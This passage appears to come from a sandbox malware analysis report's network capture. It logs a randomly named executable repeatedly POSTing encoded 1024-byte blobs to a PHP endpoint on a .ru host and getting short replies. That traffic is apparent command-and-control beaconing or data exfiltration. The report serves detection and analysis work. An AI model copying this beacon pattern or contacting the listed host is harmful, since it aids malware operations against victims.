                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            68    192.168.2.4    49981    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:34.630588055 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:34.978374958 CET    1024    OUT    Data Raw: 56 53 5f 58 56 57 55 59 5a 5f 52 51 54 5b 5b 59 55 54 59 57 51 55 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VS_XVWUYZ_RQT[[YUTYWQURSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,<"S<+((*1>.*[344%+=<9534'^&'X$.Q-"
                                                                                            Nov 5, 2024 23:53:35.441690922 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:35.511781931 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            69    192.168.2.4    49986    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:35.837266922 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:36.196834087 CET    1024    OUT    Data Raw: 53 55 5a 5e 56 5f 50 52 5a 5f 52 51 54 5d 5b 5c 55 50 59 5f 51 57 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ^V_PRZ_RQT][\UPY_QWR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;<!=8$<8=:5_):Z$<X (?:0\#$!19'X$.Q-
                                                                                            Nov 5, 2024 23:53:36.832134008 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:36.832220078 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:36.832454920 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            70 | 192.168.2.4 | 49989 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:36.970132113 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:37.321204901 CET | 1024 | OUT


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            71 | 192.168.2.4 | 49994 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:37.432349920 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:37.790030003 CET | 1284 | OUT
                                                                                            Nov 5, 2024 23:53:38.251769066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:38.323584080 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            72 | 192.168.2.4 | 49995 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:37.562148094 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:37.922621965 CET | 1024 | OUT
                                                                                            Nov 5, 2024 23:53:38.367151022 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:38.448431015 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            73 | 192.168.2.4 | 50000 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:38.571167946 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:38.930572987 CET | 1024 | OUT
                                                                                            Nov 5, 2024 23:53:39.403111935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:39.479218006 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            74 | 192.168.2.4 | 50005 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:39.607063055 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:39.961740017 CET | 1024 | OUT
                                                                                            Nov 5, 2024 23:53:40.421107054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:40.496970892 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            75 | 192.168.2.4 | 50010 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:40.918225050 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:41.274229050 CET | 1024 | OUT
                                                                                            Nov 5, 2024 23:53:41.716995001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:41.794312954 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            76 | 192.168.2.4 | 50015 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:41.923048019 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:42.275177956 CET | 1024 | OUT
                                                                                            Nov 5, 2024 23:53:42.757452965 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:42.855514050 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            77 | 192.168.2.4 | 50020 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:43.024485111 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:43.384203911 CET | 1024 | OUT


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            78 | 192.168.2.4 | 50021 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:43.384138107 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1252
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:43.742974043 CET | 1252 | OUT
                                                                                            Nov 5, 2024 23:53:44.202153921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:44.279257059 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            79 | 192.168.2.4 | 50026 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:43.746331930 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:44.102513075 CET | 1024 | OUT
                                                                                            Nov 5, 2024 23:53:44.575453997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:44.643115044 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            80 | 192.168.2.4 | 50031 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:44.778188944 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:45.600760937 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:45.677596092 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            81 | 192.168.2.4 | 50036 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:46.269557953 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:47.092099905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:47.166616917 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            82 | 192.168.2.4 | 50044 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:47.305111885 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:48.119100094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:48.195221901 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            83 | 192.168.2.4 | 50050 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:48.904880047 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            84 | 192.168.2.4 | 50055 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:49.296624899 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1272
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:50.144279957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:50.220345974 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            85 | 192.168.2.4 | 50056 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:49.428416014 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:50.230333090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:50.299886942 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            86 | 192.168.2.4 | 50061 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:50.440196991 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:51.251265049 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:51.330646038 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            87 | 192.168.2.4 | 50064 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:51.643795013 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:52.482317924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:52.553010941 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            88 | 192.168.2.4 | 50073 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:52.710714102 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:53.524394989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:53.601042032 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            89 | 192.168.2.4 | 50079 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:53.949387074 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:54.751976967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:54.825325012 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            90  192.168.2.4  50085  37.44.238.250  80  2212  C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            Nov 5, 2024 23:53:54.952097893 CET  333  OUT  POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
